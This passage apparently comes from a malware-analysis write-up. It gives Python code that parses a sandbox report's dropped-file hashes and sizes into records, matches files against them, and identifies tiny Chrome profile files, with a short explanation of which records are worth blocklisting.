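SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
"""

HASHERS = {"MD5": hashlib.md5, "SHA1": hashlib.sha1, "SHA256": hashlib.sha256, "SHA512": hashlib.sha512}
HASH_LEN = {algo: fn().digest_size * 2 for algo, fn in HASHERS.items()}   # hex chars expected
HASH_RE = re.compile(r"^(SHA512|SHA256|SHA1|MD5)([0-9a-fA-F]+)$")        # longest label first
SIZE_RE = re.compile(r"^Filesize\s*(\d+)\s*([KMG]?B)$", re.I)
PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class DroppedFile:
    size_label: str = ""        # as printed by the sandbox, e.g. "87B" or "407KB"
    path: str = ""              # empty when the report shows no path
    hashes: dict = field(default_factory=dict)   # algorithm -> lowercase hex digest

    @property
    def exact_size(self):
        """Byte count when given in bytes; KB/MB labels are rounded, so None."""
        m = re.fullmatch(r"(\d+)B", self.size_label)
        return int(m.group(1)) if m else None


def parse_dropped_files(text):
    """Split on the '-' separators; a digest of the wrong length is an error, not an IOC."""
    records, cur = [], None
    lines = [ln.strip() for ln in text.splitlines()]
    i = 0
    while i < len(lines):
        line = lines[i]
        if line == "-":
            if cur is not None and cur.hashes:
                records.append(cur)
            cur = DroppedFile()
        elif cur is None or not line:
            pass
        elif PATH_RE.match(line):
            cur.path = line
        elif line.lower() == "filesize":        # size is on the following line
            i += 1
            cur.size_label = lines[i]
        elif (m := SIZE_RE.match(line)):
            cur.size_label = m.group(1) + m.group(2).upper()
        elif (m := HASH_RE.match(line)):
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has {len(digest)} hex chars, expected {HASH_LEN[algo]}: {line}")
            cur.hashes[algo] = digest
        i += 1
    if cur is not None and cur.hashes:
        records.append(cur)
    return records


def match_bytes(data, records):
    """Records whose every listed digest equals the digest of data (size pre-filter first)."""
    d = {algo: fn(data).hexdigest() for algo, fn in HASHERS.items()}
    return [r for r in records
            if (r.exact_size is None or r.exact_size == len(data))
            and all(d[algo] == h for algo, h in r.hashes.items())]


def match_file(path, records):
    with open(path, "rb") as fh:
        return match_bytes(fh.read(), records)


# Assumed contents of empty Chrome profile state files; anything else stays unidentified.
TINY_CANDIDATES = (b"", b"[]", b"{}", b"\n")


def identify_tiny_files(records):
    """Map SHA256 -> content for records that hash to one of the candidates."""
    found = {}
    for content in TINY_CANDIDATES:
        for r in match_bytes(content, records):
            found[r.hashes["SHA256"]] = content
    return found
```

Run against the excerpt, the 2-byte record hashes to the two characters `[]`, an empty JSON array, which is ordinary browser housekeeping rather than anything the batch file dropped; the 1-byte record matches none of the candidates and stays unidentified. That is the practical point of the list: it mixes Chrome's own profile writes with the real payloads, so the records worth pivoting on are the large ones, and a blocklist built from it should carry the size alongside the digests.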